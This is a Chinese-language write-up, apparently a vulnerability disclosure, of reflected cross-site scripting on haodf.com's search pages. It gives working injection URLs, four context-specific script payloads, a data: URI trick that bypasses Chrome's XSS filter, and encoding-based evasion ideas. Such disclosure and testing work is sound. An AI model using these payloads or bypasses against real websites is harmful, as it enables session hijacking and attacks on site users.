1、首先找到可能存在问题URL --
 
代码:
http://so.haodf.com/all.php?fromcode=***&type=***&q= 以及优化后的新搜索页面http://search.haodf.com/all.php?fromcode=***&type=***&q=
2、接着从URL的特点上分析此处URL是否存在变参分离，通过研究发现这里的type的参数可指定类型有all、hospital、hospitalfaculty、doctor、aticle和desease这几种。fromcode的可指定类型为自定义，默认为utf-8,也就是说 ISO8859-1、GBK、utf-7、utf-8等编码都是被允许的，(后来经测试的确如此)，也就是说我们可以尝试通过自定义编码为gb2312来吃掉某些过滤或者通过utf-7进行编码绕过，我们还可以对其进行混淆攻击等跨站attck。
 
3、控制fromcode不变，构造type的类型，进行xss测试。对源代码简单的分析了下，当type=all时候，页面有一处显示与其他参数不同，code如下：
 
代码:
code:[<a class="green1_link" href="/all.php?fromcode=utf-8&type=article&q=test">更多的关于“test”的知识</a>]
可以看到test是我们提交的参数，页面将它输出，输出的函数可以构成另一处XSS，我们在下面会说。这里呢，可以formation XSS，我们构造URL:
 
代码:
http://so.haodf.com/all.php?fromcode=utf-8&type=all&q=<script>alert(/nandi/)</script>
,IE提交，成功触发xss，连续弹了4下，因为type=all的页面有4个地方会将它回显出来。
 
当提交type参数等于all、hospital、hospitalfaculty、doctor、aticle和desease，除去上面所说的一处显示不同，剩下四处都是相同的，我们来看：
 
(为了美观，省略部分代码)
 
代码:
code1:[<title>好大夫在线搜索: test</title>]
code2:[<input **** value="test" ****/>]
code3:[<a href="al**&q=test">综合</a>]
code4:[<center>[kw=test(1487)=]</center>](这里是type=all时候的页面输出代码)
我们依次构造对应的攻击参数，因为都是在HTML属性中输出，网站只对输入进行了URL编码，所以无论我们输入什么，都可以成功触发，对此厂商应该加强对于不同的页面进行不同的过滤，也要防止二次渲染问题的出现。
 
形式：http://so.haodf.com/all.php?fromcode=utf-8&type=all&q=exp*或者http://search.haodf.com/all.php? ... ;type=all&q=exp*
 
代码:
exp1:[</title><script>alert(/nandi/)</script><title>]
exp2:[" /><script>alert(/nandi/)</script><xss a="]
exp3:[a"><script>alert(/nandi/)</script><""]
exp4:[</center><script>alert(/nandi/)<center>]
以上测试来自IE，当换到chrome下时，console里会提示Refused to execute a JavaScript script. Source code of script found within request.无比强大的过滤功能，看前后源代码，发现源网页中本来就有script的标签属性，于是构造code:
 
代码:
[<script src=data:,alert(/nandi/)<!--]
给它插入，成功在chrome下绕过过滤，弹出xss。
 
4、总结一下过程后，利用iframe进行测试的时候，发现了一个以前没碰到过的小问题，我自己的猜测可能是同源策略的限制或者是nginx的配置限制。
 
构造如下参数：
 
代码:
<iframe style="v:expression() !important" src="www.baidu.com"></iframe>
利用URL1:
 
代码:
http://search.haodf.com/all.php?orderby=1&q=<iframe style="v:expression() !important" src="www.baidu.com"></iframe>
(这里框架里显示404 not found)
 
利用URL2:
 
代码:
http://search.haodf.com/all.php?orderby=1&q=<iframe style="v:expression() !important" src="www.baidu.com"></iframe>
(这里框架里显示的是so.haodf.com这个网页，也就是我插入百度显示的却是被插入页面)
 
The End